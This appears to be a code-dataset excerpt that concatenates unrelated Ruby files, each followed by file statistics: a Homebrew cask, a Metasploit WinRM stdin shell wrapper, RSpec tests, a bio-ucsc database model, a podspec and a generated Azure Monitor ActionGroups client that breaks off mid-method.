cask "snagit" do version "2021.0.2" sha256 :no_check # required as upstream package is updated in-place url "https://download.techsmith.com/snagitmac/releases/Snagit.dmg" name "Snagit" desc "Screen capture software" homepage "https://www.techsmith.com/screen-capture.html" depends_on macos: ">= :mojave" app "Snagit #{version.major}.app" end
25.785714
69
0.725762
e9d21e04a2cfadf644e1bfc3bba576fde74a822d
4,015
require 'winrm' require 'winrm/wsmv/write_stdin' require 'net/winrm/ctrl_c' require 'net/winrm/receive_response_reader' module Net module MsfWinRM # WinRM shell to use stdin, rather than sending isolated commands class StdinShell < WinRM::Shells::Cmd # We create our own empty finalizers because the built-in one triggers a # request using the Rex HTTP client, which segfaults; possibly because it # creates a thread, or something else that is not allowed in a finalizer. # In this situation (observed only when the user quits MSF with active sessions), # we'll just let the shell continue. def remove_finalizer; end def add_finalizer; end def send_command(command, arguments = []) open unless shell_id super(command, arguments) end # Runs a shell command synchronously, and returns the output def shell_command_synchronous(command, args, timeout) start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond) command_id = send_command(command, args) buffer = [] begin while (Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond) - start_time) < (timeout * 1000) read_stdout(command_id) do |stdout, stderr| buffer << stdout if stdout buffer << stderr if stderr end end rescue EOFError # Shell terminated of its own accord ensure cleanup_command(command_id) end buffer.join('') end # Runs the specified command with optional arguments # @param block [&block] The optional callback for any realtime output # @yieldparam [string] standard out response text # @yieldparam [string] standard error response text # @yieldreturn [WinRM::Output] The command output def read_stdout(command_id, &block) open unless shell_id begin response_reader.read_output(command_output_message(shell_id, command_id), &block) rescue WinRM::WinRMWSManFault => e # If no output is available before the wsman:OperationTimeout expires, # the server MUST return a WSManFault with the Code attribute equal to # 2150858793. When the client receives this fault, it SHOULD issue # another Receive request. # http://msdn.microsoft.com/en-us/library/cc251676.aspx if e.fault_code == '2150858793' yield nil, nil else raise end end end def send_ctrl_c(command_id) ctrl_c_msg = CtrlC.new( connection_opts, shell_uri: shell_uri, shell_id: shell_id, command_id: command_id ) transport.send_request(ctrl_c_msg.build) end def send_stdin(input, command_id) open unless shell_id stdin_msg = WinRM::WSMV::WriteStdin.new( connection_opts, shell_uri: shell_uri, shell_id: shell_id, command_id: command_id, stdin: input ) result = transport.send_request(stdin_msg.build) result rescue WinRM::WinRMWSManFault => e raise unless [ERROR_OPERATION_ABORTED, SHELL_NOT_FOUND].include?(e.fault_code) rescue WinRM::WinRMHTTPTransportError => e # dont let the cleanup raise so we dont lose any errors from the command logger.info("[WinRM] #{e.status_code} returned in cleanup with error: #{e.message}") end def response_reader @response_reader ||= ReceiveResponseReader.new(transport, logger) end def open_shell msg = WinRM::WSMV::CreateShell.new(connection_opts, shell_opts) resp_doc = transport.send_request(msg.build) match = REXML::XPath.first(resp_doc, '//rsp:Owner') self.owner = match.text if match REXML::XPath.first(resp_doc, "//*[@Name='ShellId']").text end attr_accessor :owner end end end
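A hedged sketch of one way this shell might be driven, assuming `shell` is an already-constructed Net::MsfWinRM::StdinShell; in practice construction happens in the framework's WinRM session setup, with connection options and a transport that are outside this file, and the commands shown are arbitrary examples:

# One-shot command with a 10-second budget for collecting output.
output = shell.shell_command_synchronous('cmd.exe', ['/c', 'ipconfig'], 10)
puts output

# Interactive flow: start a command, feed it stdin, read a chunk of output,
# then interrupt and clean up using the same command_id.
command_id = shell.send_command('powershell.exe', [])
shell.send_stdin("Get-Process\r\n", command_id)
shell.read_stdout(command_id) { |stdout, stderr| print stdout.to_s, stderr.to_s }
shell.send_ctrl_c(command_id)
shell.cleanup_command(command_id)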
35.530973
111
0.645579
f716f6c1c5d1566ee0fb5c7346a9a01a5f8238f6
639
require_relative '../../lib/inspect_parameter_source'

describe InspectParameterSource do
  let(:source) { double }
  let(:headers) { Hash.new }

  subject { InspectParameterSource.new(source) }

  describe "#language" do
    before { source.stub_chain(:request, :headers).and_return(headers) }

    context "when language is set" do
      before { headers['HTTP_ACCEPT_LANGUAGE'] = 'en;en-us' }

      it "returns the set value" do
        expect(subject.language).to eq('en')
      end
    end

    context "when there is no language set" do
      it "returns nil" do
        expect(subject.language).to be_nil
      end
    end
  end
end
24.576923
72
0.661972
bb1f87a9576b6f429a294ef339c3aed1b1ee7418
3,117
# Copyright::
#   Copyright (C) 2011 MISHIMA, Hiroyuki <missy at be.to / hmishima at nagasaki-u.ac.jp>
# License:: The Ruby licence (Ruby's / GPLv2 dual)
#
# In the hg18 database, this table is actually separated
# into "chr1_*", "chr2_*", etc. This class dynamically
# defines *::Chr1_*, *::Chr2_*, etc. The
# find_by_interval class method calls an appropriate per-chromosome class automatically.

module Bio
  module Ucsc
    module BraFlo1
      class ChainPetMar1
        KLASS = "ChainPetMar1"
        KLASS_S = KLASS[0..0].downcase + KLASS[1..-1]

        Bio::Ucsc::BraFlo1::CHROMS.each do |chr|
          class_eval %!
      class #{chr[0..0].upcase + chr[1..-1]}_#{KLASS} < DBConnection
        self.table_name = "#{chr[0..0].downcase + chr[1..-1]}_#{KLASS_S}"
        self.primary_key = nil
        self.inheritance_column = nil

        def self.find_by_interval(interval, opt = {:partial => true});
          interval = Bio::Ucsc::Gi.wrap(interval)
          find_first_or_all_by_interval(interval, :first, opt)
        end

        def self.find_all_by_interval(interval, opt = {:partial => true});
          interval = Bio::Ucsc::Gi.wrap(interval)
          find_first_or_all_by_interval(interval, :all, opt)
        end

        def self.find_first_or_all_by_interval(interval, first_all, opt);
          interval = Bio::Ucsc::Gi.wrap(interval)
          zstart = interval.zero_start
          zend   = interval.zero_end
          if opt[:partial] == true
            where = <<-SQL
        tName = :chrom
    AND bin in (:bins)
    AND ((tStart BETWEEN :zstart AND :zend)
     OR (tEnd BETWEEN :zstart AND :zend)
     OR (tStart <= :zstart AND tEnd >= :zend))
            SQL
          else
            where = <<-SQL
        tName = :chrom
    AND bin in (:bins)
    AND ((tStart BETWEEN :zstart AND :zend)
    AND (tEnd BETWEEN :zstart AND :zend))
            SQL
          end
          cond = {
            :chrom => interval.chrom,
            :bins => Bio::Ucsc::UcscBin.bin_all(zstart, zend),
            :zstart => zstart,
            :zend => zend,
          }
          self.find(first_all,
                    { :select => "*",
                      :conditions => [where, cond], })
        end
      end
          !
        end # each chromosome

        def self.find_by_interval(interval, opt = {:partial => true});
          interval = Bio::Ucsc::Gi.wrap(interval)
          chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1]
          chr_klass = self.const_get("#{chrom}_#{KLASS}")
          chr_klass.__send__(:find_by_interval, interval, opt)
        end

        def self.find_all_by_interval(interval, opt = {:partial => true});
          interval = Bio::Ucsc::Gi.wrap(interval)
          chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1]
          chr_klass = self.const_get("#{chrom}_#{KLASS}")
          chr_klass.__send__(:find_all_by_interval, interval, opt)
        end
      end # class
    end # module BraFlo1
  end # module Ucsc
end # module Bio
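A brief usage sketch, assuming an established DBConnection to the UCSC braFlo1 database; the interval string is a placeholder and its sequence name must match one of Bio::Ucsc::BraFlo1::CHROMS for the per-chromosome dispatch described in the header comment to resolve:

# Gi.wrap parses the interval string, and the class method forwards the call to the
# matching Chr*_ChainPetMar1 class, restricting the scan with the UCSC bin index.
rows = Bio::Ucsc::BraFlo1::ChainPetMar1.find_all_by_interval("chr1:1,000-20,000")
rows.each { |chain| puts [chain.tName, chain.tStart, chain.tEnd].join("\t") }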
38.012195
120
0.548284
872ba1ab43d56a3e1ae3bba49251dcee3924e0a2
1,557
# frozen_string_literal: true require 'spec_helper' RSpec.describe Atlassian::JiraConnect::Serializers::PullRequestEntity do let_it_be(:project) { create_default(:project, :repository) } let_it_be(:merge_requests) { create_list(:merge_request, 2, :unique_branches) } let_it_be(:notes) { create_list(:note, 2, system: false, noteable: merge_requests.first) } subject { described_class.represent(merge_requests).as_json } it 'exposes commentCount' do expect(subject.first[:commentCount]).to eq(2) end context 'with user_notes_count option' do let(:user_notes_count) { merge_requests.map { |merge_request| [merge_request.id, 1] }.to_h } subject { described_class.represent(merge_requests, user_notes_count: user_notes_count).as_json } it 'avoids N+1 database queries' do control_count = ActiveRecord::QueryRecorder.new do described_class.represent(merge_requests, user_notes_count: user_notes_count) end.count merge_requests << create(:merge_request, :unique_branches) expect { subject }.not_to exceed_query_limit(control_count) end it 'uses counts from user_notes_count' do expect(subject.map { |entity| entity[:commentCount] }).to match_array([1, 1, 1]) end context 'when count is missing for some MRs' do let(:user_notes_count) { [[merge_requests.last.id, 1]].to_h } it 'uses 0 as default when count for the MR is not available' do expect(subject.map { |entity| entity[:commentCount] }).to match_array([0, 0, 1]) end end end end
35.386364
101
0.722543
4a563e84dde4d8e84a15a6f86f0e159a4dc06f09
629
# frozen_string_literal: true require_relative '../../command' require_relative '../../crawler/genrelist' module Yomou module Commands class Genrerank class Download < Yomou::Command def initialize(period, genre, options) @period = period @genre = genre @options = options end def execute(input: $stdin, output: $stdout) crawler = GenrelistCrawler.new options = {} options[:genres] = [@genre] if @genre options[:periods] = [@period] if @period crawler.download(options) end end end end end
23.296296
51
0.586645
334411f8476106ae3cc1c65e2ee6ca2b4d74bf6d
156
require 'test_helper' class ExtensionTest < ActiveSupport::TestCase # Replace this with your real tests. test "the truth" do assert true end end
17.333333
45
0.737179
62becaf9148776be3b6b672a72a094e293f9f693
572
Pod::Spec.new do |s| s.name = "SSApplication" s.version = "0.0.1" s.summary = "A UIApplication subclass to start your app off right." s.homepage = "https://github.com/splinesoft/SSApplication" s.license = { :type => 'MIT', :file => 'LICENSE' } s.author = { "Jonathan Hersh" => "[email protected]" } s.source = { :git => "https://github.com/splinesoft/SSApplication.git", :tag => s.version.to_s } s.platform = :ios, '6.0' s.requires_arc = true s.source_files = 'SSApplication/*.{h,m}' s.frameworks = 'UIKit' end
40.857143
104
0.589161
610cfdb13dd19634700d636f9b866ddc80f42671
32,487
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Monitor::Mgmt::V2018_03_01 # # Monitor Management Client # class ActionGroups include MsRestAzure # # Creates and initializes a new instance of the ActionGroups class. # @param client service class for accessing basic functionality. # def initialize(client) @client = client end # @return [MonitorManagementClient] reference to the MonitorManagementClient attr_reader :client # # Create a new action group or update an existing one. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group [ActionGroupResource] The action group to create or use # for the update. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupResource] operation results. # def create_or_update(resource_group_name, action_group_name, action_group, custom_headers:nil) response = create_or_update_async(resource_group_name, action_group_name, action_group, custom_headers:custom_headers).value! response.body unless response.nil? end # # Create a new action group or update an existing one. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group [ActionGroupResource] The action group to create or use # for the update. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def create_or_update_with_http_info(resource_group_name, action_group_name, action_group, custom_headers:nil) create_or_update_async(resource_group_name, action_group_name, action_group, custom_headers:custom_headers).value! end # # Create a new action group or update an existing one. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group [ActionGroupResource] The action group to create or use # for the update. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def create_or_update_async(resource_group_name, action_group_name, action_group, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, 'action_group is nil' if action_group.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() request_content = @client.serialize(request_mapper, action_group) request_content = request_content != nil ? 
JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:put, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 201 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end # Deserialize Response if status_code == 201 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Get an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupResource] operation results. # def get(resource_group_name, action_group_name, custom_headers:nil) response = get_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Get an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def get_with_http_info(resource_group_name, action_group_name, custom_headers:nil) get_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! end # # Get an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. 
# @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def get_async(resource_group_name, action_group_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Delete an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # def delete(resource_group_name, action_group_name, custom_headers:nil) response = delete_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! nil end # # Delete an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. 
# def delete_with_http_info(resource_group_name, action_group_name, custom_headers:nil) delete_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! end # # Delete an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def delete_async(resource_group_name, action_group_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:delete, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 204 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? result end promise.execute end # # Updates an existing action group's tags. To update other fields use the # CreateOrUpdate method. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group_patch [ActionGroupPatchBody] Parameters supplied to the # operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupResource] operation results. # def update(resource_group_name, action_group_name, action_group_patch, custom_headers:nil) response = update_async(resource_group_name, action_group_name, action_group_patch, custom_headers:custom_headers).value! response.body unless response.nil? end # # Updates an existing action group's tags. To update other fields use the # CreateOrUpdate method. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. 
# @param action_group_patch [ActionGroupPatchBody] Parameters supplied to the # operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def update_with_http_info(resource_group_name, action_group_name, action_group_patch, custom_headers:nil) update_async(resource_group_name, action_group_name, action_group_patch, custom_headers:custom_headers).value! end # # Updates an existing action group's tags. To update other fields use the # CreateOrUpdate method. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group_patch [ActionGroupPatchBody] Parameters supplied to the # operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def update_async(resource_group_name, action_group_name, action_group_patch, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, 'action_group_patch is nil' if action_group_patch.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupPatchBody.mapper() request_content = @client.serialize(request_mapper, action_group_patch) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:patch, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? 
nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Get a list of all action groups in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupList] operation results. # def list_by_subscription_id(custom_headers:nil) response = list_by_subscription_id_async(custom_headers:custom_headers).value! response.body unless response.nil? end # # Get a list of all action groups in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_subscription_id_with_http_info(custom_headers:nil) list_by_subscription_id_async(custom_headers:custom_headers).value! end # # Get a list of all action groups in a subscription. # # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_subscription_id_async(custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/providers/microsoft.insights/actionGroups' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Get a list of all action groups in a resource group. 
# # @param resource_group_name [String] The name of the resource group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupList] operation results. # def list_by_resource_group(resource_group_name, custom_headers:nil) response = list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Get a list of all action groups in a resource group. # # @param resource_group_name [String] The name of the resource group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_resource_group_with_http_info(resource_group_name, custom_headers:nil) list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! end # # Get a list of all action groups in a resource group. # # @param resource_group_name [String] The name of the resource group. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_resource_group_async(resource_group_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Enable a receiver in an action group. 
This changes the receiver's status from # Disabled to Enabled. This operation is only supported for Email or SMS # receivers. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param enable_request [EnableRequest] The receiver to re-enable. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # def enable_receiver(resource_group_name, action_group_name, enable_request, custom_headers:nil) response = enable_receiver_async(resource_group_name, action_group_name, enable_request, custom_headers:custom_headers).value! nil end # # Enable a receiver in an action group. This changes the receiver's status from # Disabled to Enabled. This operation is only supported for Email or SMS # receivers. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param enable_request [EnableRequest] The receiver to re-enable. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def enable_receiver_with_http_info(resource_group_name, action_group_name, enable_request, custom_headers:nil) enable_receiver_async(resource_group_name, action_group_name, enable_request, custom_headers:custom_headers).value! end # # Enable a receiver in an action group. This changes the receiver's status from # Disabled to Enabled. This operation is only supported for Email or SMS # receivers. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param enable_request [EnableRequest] The receiver to re-enable. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def enable_receiver_async(resource_group_name, action_group_name, enable_request, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, 'enable_request is nil' if enable_request.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::EnableRequest.mapper() request_content = @client.serialize(request_mapper, enable_request) request_content = request_content != nil ? 
